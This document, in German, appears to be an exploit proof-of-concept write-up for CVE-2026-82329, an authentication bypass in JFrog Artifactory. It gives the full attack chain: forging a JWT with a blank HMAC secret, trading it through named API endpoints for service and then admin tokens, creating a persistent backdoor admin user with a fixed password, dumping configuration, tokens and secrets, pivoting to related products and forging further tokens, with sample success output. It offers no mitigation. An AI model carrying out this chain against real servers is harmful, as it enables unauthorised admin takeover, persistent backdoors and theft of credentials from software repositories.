
Exploit-PoC für CVE-2026-82329, eine Authentifizierungsumgehung in JFrog Artifactory. Demonstriert das Fälschen von JWT-Tokens, um Admin-Zugriff zu erlangen und einen persistenten Backdoor-Benutzer zu erstellen.
CVE-2026-82329 — JFrog Artifactory Auth Bypass
Die Schwachstelle
Kritische Authentifizierungsumgehung in JFrog Artifactory (Versionen 7.111.20, 7.117.27, 7.125.19, 7.133.28, 7.146.37, 7.161.19). Der Fehler ermöglicht es einem nicht authentifizierten Angreifer, ein JWT mit einem leeren HMAC-Geheimnis (32 Bytes aus 0x20) zu fälschen, ein Admin-Token zu erzeugen und einen Hintertür-Benutzer anzulegen.
Exploit-Kette
Schritt Aktion 1 JWT mit alg=HS256, kid=SHA256(""), skip_node_registration=true fälschen 2 JWT an /access/api/v1/registry/join senden → SERVICE-Token erhalten 3 SERVICE-Token über /access/api/v1/tokens gegen ADMIN-Token eintauschen 4 Admin-Zugriff über /artifactory/api/system/configuration, /access/api/v1/tokens, /artifactory/api/system/version verifizieren 5 Persistenten Admin-Benutzer über /artifactory/api/security/users/{user} anlegen 6 Konfiguration, Tokens, Benutzer, Repos, Geheimnisse auslesen 7 Tokens für hochwertige Subjekte fälschen
Angriffsablauf
BLANK_SECRET = b"\x20" * 32
↓
JWT fälschen (HS256, kid=hashlib.sha256(""))
↓
POST /access/api/v1/registry/join
↓
SERVICE-Token (scp=admin)
↓
POST /access/api/v1/tokens
↓
ADMIN-Token (scp=applied-permissions/admin, aud=*)
↓
Admin nachweisen (GET /artifactory/api/system/configuration → 200)
↓
PUT /artifactory/api/security/users/0xTerror
↓
Persistenter Admin-Benutzer: 0xTerror:Terrorp0c!7777
↓
Auslesen: Konfiguration, Tokens, Benutzer, Repos, Geheimnisse
↓
Pivot-Check: Xray, Mission Control, Distribution, etc.
↓
Tokens für hochwertige Subjekte fälschen
PoC-Ausgabebeispiel
[+] Schritt 1 /registry/join -> HTTP 201 SERVICE-Token (scp=admin)
[+] Schritt 2 /access/api/v1/tokens -> HTTP 200 ADMIN-Token (scp=applied-permissions/admin)
[+] Schritt 3 Admin-Nachweis: config=200, tokens=200, version=200
[+] Schritt 4 Admin-Benutzer '0xTerror' anlegen -> HTTP 201
[=] VERWUNDBAR — nicht authentifizierter Angreifer erhielt ADMIN
Admin-Benutzer: 0xTerror:Terrorp0c!7777